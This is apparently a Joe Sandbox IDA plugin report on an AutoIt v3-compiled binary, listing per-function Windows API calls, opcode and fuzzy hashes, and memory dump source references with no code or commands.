                                                                                                                                                                                                                                                      • Opcode ID: 707425740fa6a675dd5ddb0698e6a8718fcfcdb51c3e9c5f55927bf565df75a4
                                                                                                                                                                                                                                                      • Instruction ID: d8e0c2ecfd7ad7969b6f9f91d69e79dfedee0b7d0c3433f1fc305036a0996607
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 707425740fa6a675dd5ddb0698e6a8718fcfcdb51c3e9c5f55927bf565df75a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BED092A9E6C749B9EC29A7249C1FFF72A08F3017A1FD845C9B603D90C0A8E47D01B071
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EFAD3E), ref: 00EFB124
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LogonUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1244722697-0
                                                                                                                                                                                                                                                      • Opcode ID: ed87a7666999a3aaae99fc15df4acd20ef29c961ec27c1202701765c589f488c
                                                                                                                                                                                                                                                      • Instruction ID: 8c2ed103e05d066ecde6b59726ee84da3e28f83755d9f66a204562e6d3abfa40
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed87a7666999a3aaae99fc15df4acd20ef29c961ec27c1202701765c589f488c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD05E321A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA11C60A0C671D531AB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                                                                      • Opcode ID: 190f9db2a005aa6f8b3e211be7e510e9fb35be5e45ad3b867faa1b03e142997d
                                                                                                                                                                                                                                                      • Instruction ID: ef951930665592fb499e5794f9ef21164cd4da69dd8a41c70d36efef67996255
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 190f9db2a005aa6f8b3e211be7e510e9fb35be5e45ad3b867faa1b03e142997d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C04CB240010DDFC751CBC4C944AEEB7BCAB04301F1050919145F2110D7749B45AB72
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EE818F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                      • Opcode ID: 239137ad1c0aa56ade477f51d24f1d875a73a6dd7e156293d9dae8c9e43325ad
                                                                                                                                                                                                                                                      • Instruction ID: 6e32eadadeeaec763d4b86230bf21f0317e546423503a1fa6fa8c258b371d563
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 239137ad1c0aa56ade477f51d24f1d875a73a6dd7e156293d9dae8c9e43325ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3A0223000020CFBCF002F82FC088A83FACFB022A0B000020FC0C00030CB33A820AAE2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                                                                                                      • Opcode ID: fba1e90097d1cd0b4bdb90396b4d57676bffb6090f5701fa21da5199266ff2b1
                                                                                                                                                                                                                                                      • Instruction ID: 97f61b3124c1877946cc471e2d5bce1c812cb14e91bfd79b6c88ecb0b9e5794c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fba1e90097d1cd0b4bdb90396b4d57676bffb6090f5701fa21da5199266ff2b1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26928C706083418FD724DF28C480B6AB7E1FF88314F14985EE99A9B392D7B1ED46DB52
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 95ccbcd517bed237720d71696e1d57f20f8e081036569ebe849d599c2ac43f5b
                                                                                                                                                                                                                                                      • Instruction ID: d7732f7999e4b3f82fc369603baa1eb703cfc2e789a0d88e0ac6cce96e0f3dd7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95ccbcd517bed237720d71696e1d57f20f8e081036569ebe849d599c2ac43f5b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4822ABB1A042058FDB24DF58C590FAAB7F0FF18314F14916EE956AB351E336AD82CB91
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 49df6f48c93b136498c5b5b3ddbd626b3d641ac65d33c88385970b4019e5cae2
                                                                                                                                                                                                                                                      • Instruction ID: de4bf498510290b2cce4e68a6b1bd3d50cb3a1158d49a16483ee5a29233ded94
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49df6f48c93b136498c5b5b3ddbd626b3d641ac65d33c88385970b4019e5cae2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94128B70A006099FDF04DFA4DA85AEEB7F5FF48310F205569E806F7291EB36A912DB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3728558374-0
                                                                                                                                                                                                                                                      • Opcode ID: 95976f65d661d12ddcdd1679ba4171950ecdf2c4d35cc598a63ed50f119bb323
                                                                                                                                                                                                                                                      • Instruction ID: 6537894fb4703ac27468fef8b3ff31efbeb4e9ce3c353e0420b84e43f1857811
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95976f65d661d12ddcdd1679ba4171950ecdf2c4d35cc598a63ed50f119bb323
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5902B070A00209DBCF44DF68D992BAEB7F5EF44310F149069E806EB395EB35DA12DB91
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                                                                                      • Instruction ID: 14f935f7d44ee054c3379d828e6c171f1751d03394900a703499e9ed4e667ba4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2C10A322051E70ADF2D863AD43043EFBA19E917B931A276ED8B3DB5D1EF60C564D620
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                                                                                      • Instruction ID: 443ef35ffcc459ffc036aa918215926a08ffe182bfecddcffffa115e8e09aac7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AC10A322051E709DF1D863AD43443EFBA19E927B931A276ED8B3EB1D5EF20C564D610
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                                                                      • Instruction ID: 2c1ecab7a10760d61b8158d5ac136d15ccd7d12b7e34c2dffdb3dd4085039be1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1C1A2322050A309DF2DC639943053EBBA19A917B931A277FD8B3DB6D5EF20C566D620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F1A2FE
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F1A310
                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00F1A31E
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F1A338
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F1A33F
                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F1A480
                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F1A490
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A4D8
                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00F1A4E4
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F1A51E
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A540
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A553
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A55E
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F1A567
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A576
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F1A57F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A586
                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00F1A591
                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A5A3
                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F4D9BC,00000000), ref: 00F1A5B9
                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00F1A5C9
                                                                                                                                                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F1A5EF
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F1A60E
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A630
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F1A81D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                      • Opcode ID: 77340870c56b2420364add5091724ad0a80412eb3ae08f4c69c3a6c19cc5fe1f
                                                                                                                                                                                                                                                      • Instruction ID: 5ebb9ed2b70788b21e96c3e50b5b965115f27645c876ed732cebfb91ca703d7a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77340870c56b2420364add5091724ad0a80412eb3ae08f4c69c3a6c19cc5fe1f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27027C75900208EFDB14DFA4CD89EAE7BB9FB49310F108158F915AB2A1C771ED41EB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00F2D2DB
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F2D30C
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00F2D318
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00F2D332
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00F2D341
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D36C
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00F2D374
                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00F2D37B
                                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00F2D38A
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F2D391
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00F2D3DC
                                                                                                                                                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 00F2D40E
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F2D439
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(00000012), ref: 00F2D5AE
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SetTextColor.GDI32(?,?), ref: 00F2D5B2
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColorBrush.USER32(0000000F), ref: 00F2D5C8
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(0000000F), ref: 00F2D5D3
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetSysColor.USER32(00000011), ref: 00F2D5F0
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2D5FE
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SelectObject.GDI32(?,00000000), ref: 00F2D60F
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SetBkColor.GDI32(?,00000000), ref: 00F2D618
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SelectObject.GDI32(?,?), ref: 00F2D625
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D644
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2D65B
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00F2D670
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2D698
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
